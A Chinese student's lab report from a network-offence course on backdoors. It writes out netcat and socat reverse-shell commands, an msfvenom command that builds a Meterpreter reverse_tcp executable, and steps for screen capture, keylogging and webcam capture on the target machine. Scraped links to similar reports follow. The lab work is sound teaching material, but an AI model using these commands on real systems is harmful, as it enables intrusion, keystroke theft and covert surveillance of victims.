20145207《网络对抗》MAL后门原理与实践
20145207《网络对抗》MAL后门原理与实践
基础问题回答
(1)例举一个后门进入到你系统中的可能方式?
下载软件,淘宝虚假链接,买卖账号时侵入的黑客
(2)例举一个后门启动起来(win及linux)的方式?
软件伪装的方式来让他人在不知情况下点进去,
(3)Meterpreter有哪些给你映像深刻的功能?
获得摄像头控制权,获得system权限,得到密码
(4)如何发现自己有系统有没有被安装后门?
杀毒软件算不算(尴尬)
实验总结与体会
开始感觉屌屌的,虽然确实可以盗取获得一些东西,摄像权密码之类的,虽然很厉害,很能拿出去装x。但是要求条件好苛刻,需要关人家防火墙,还得跟人家桥接,同一网段还得知道ip。瞬间感觉好智障,人家怎么会那样让你侵入。。
实践一:ncat
知识要求:
1.NetCat是一个非常简单的Unix工具,可以读、写TCP或UDP网络连接(network connection);
2.netcat实现简单服务器命令:nc -l -p //-l表明nc处于监听模式,-p指定端口号;
3.nc的-e选项,指定连接后执行的程序。
windows获得linux shell
- windows作为攻击端开启监听模式
ncat.exe -l -p 5207 - linux反弹连接并且设置连接后启动shell。
nc 172.30.202 5207 -e /bin/sh

linux获得windows shell。
相反的步骤,在windows下进行即可。
ncat文件传输
1、监听端windows命令:ncat.exe -lv port > filename
2、传输端kali命令:nc windows_ip port < filename
结果如下(传输的文件在ncat文件夹下):

cron启动
命令:crontab -e修改文件,crontab -l查看修改的文件。

实践二:socat
windows获得kali shell
1、kali设置监听命令socat tcp-l:5207 system:bash,pty,stderr
2、windows连接,并获取权限socat readline tcp:172.30.1.181 5207
结果:

kali获得window shell
1、windows端如下图:

2、kali端意思一样的,忘了截了。
实践三:
1、生成后门程序命令:msfvenom -p windows/meterpreter/reverse_tcp LHOST=linux_ip LPORT=444 -f exe >20145207.exe
2、在windows端运行后门程序,并获得权限如下图所示:

实践四
1.获取目标主机当前屏幕界面

(破虚拟机卡的我差点重写)
2.获取键盘内容。keyscan_start为开始获取目标主机键盘输入内容,keyscan_dump为结束获取目的主机键盘内容,输入之后会显示键盘的输入内容

3.获取目标主机摄像头记录

20145207《网络对抗》MAL后门原理与实践的更多相关文章
- 20155323刘威良 网络对抗 Exp2 后门原理与实践
20155323 刘威良<网络攻防>Exp2后门原理与实践 实验内容 (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用socat获取主机操作Shell, ...
- 20145204《网络对抗》MAL后门原理与实践
20145204<网络对抗>MAL后门原理与实践 实践内容说明 (1)使用netcat获取主机操作Shell,cron启动 (1分) (2)使用socat获取主机操作Shell, 任务计划 ...
- 20155331 丹增旦达 网络攻防 Exp2后门原理与实践
20155331 丹增旦达<网络攻防>Exp2后门原理与实践 实验内容 (1)使用netcat获取主机操作Shell,cron启动 (2)使用socat获取主机操作Shell, 任务计划启 ...
- 20155302 Exp2 后门原理与实践
20155302<网络对抗>后门原理与实践 实验要求 1.使用netcat获取主机操作Shell,cron启动 (0.5分) 2.使用socat获取主机操作Shell, 任务计划启动 (0 ...
- 2018-2019-2 网络对抗技术 20165232 Exp2 后门原理与实践
2018-2019-2 网络对抗技术 20165232 Exp2 后门原理与实践 1. 后门原理与实践实验说明及预备知识 一.实验说明 任务一:使用netcat获取主机操作Shell,cron启动 ( ...
- 20155324《网络对抗》Exp2 后门原理与实践
20155324<网络对抗>Exp2 后门原理与实践 20155324<网络对抗>Exp2 后门原理与实践 常用后门工具实践 Windows获得Linux Shell 在Win ...
- 2018-2019-2 20165237《网络对抗技术》Exp2 后门原理与实践
2018-2019-2 20165237<网络对抗技术>Exp2 后门原理与实践 一.实践目标 使用netcat获取主机操作Shell,cron启动 使用socat获取主机操作Shell, ...
- 20165221 《网络对抗技术》EXP2:后门原理与实践
20165221 <网络对抗技术>EXP2:后门原理与实践 实验任务 任务一:使用netcat获取主机操作Shell,cron启动 (0.5分) 任务二:使用socat获取主机操作Shel ...
- 2018-2019-2 网络对抗技术 20165325 Exp2 后门原理与实践
2018-2019-2 网络对抗技术 20165325 Exp2 后门原理与实践 实验内容(概要): (1)使用netcat获取主机Shell,cron启动 首先两个电脑(虚拟机)都得有netcat, ...
随机推荐
- CopyOnWriteArrayList对比ArrayList
ArrayList非线程安全,CopyOnWriteArrayList线程安全 ArrayList添加元素的时候内部会预先分配存储空间,CopyOnWriteArrayList每次添加元素都会重新co ...
- 针对ArcGIS Server 跨域问题的解释
在博客Hello World文章中提起过,以前在sinaapp中建立过wordpress博客,也写过一篇关于ArcGIS JavaScript API的文章,但是由于sinaapp开始收费以后,我的个 ...
- Handler的简单使用介绍
Handler在android程序开发中使用的非常频繁.我们知道android是不允许在子线程中更新UI的,这就需要借助Handler来实现,那么你是否想过为什么一定要这个这样子做呢?而且Handle ...
- PHP不定维数组去除空值
最近遇到一个问题,是将不定维数组的空值去除,回来研究了一下,写出来了,不知道是否还能优化 写的不好的,如果有好的想法或者好的实现方法,欢迎提出来,如果哪里写错了,也欢迎大牛可以讲解一下 代码如下,欢迎 ...
- tensorflow一个很好的博客
http://blog.csdn.net/mydear_11000/article/details/53197891
- Java 线程池使用
在实现类中,运用线程池 serviceImpl.java //定义线程池 private static ThreadPoolExecutor executor1 = new ThreadPoolExe ...
- C/C++判断文件/文件夹是否存在 转
一.判断文件夹是否存在: 1.用CreateDirectory(".//FileManege",NULL);如果文件夹FileManege不存在,则创建. 2.或者 ...
- update更新修改数据
update ---整表更新数据 update 表名 set 需要调整字段1= '值1' ,需要调整字段2= '值2' …… ---更新条件数据 update 表名 set 需要调整字段 ...
- Linux Mysql 卸载
Linux下mysql的卸载: 1.查找以前是否装有mysql 命令:rpm -qa|grep -i mysql 可以看到mysql的两个包: mysql-4.1.12-3.RHEL4.1 mysql ...
- python多线程知识-实用实例
python多线程使用场景:IO操作,不适合CPU密集操作型任务 1.多个线程内存共享 2.线程同时修改同一份数据需要加锁,mutex互斥锁 3.递归锁:多把锁,锁中有锁 4.python多线程, ...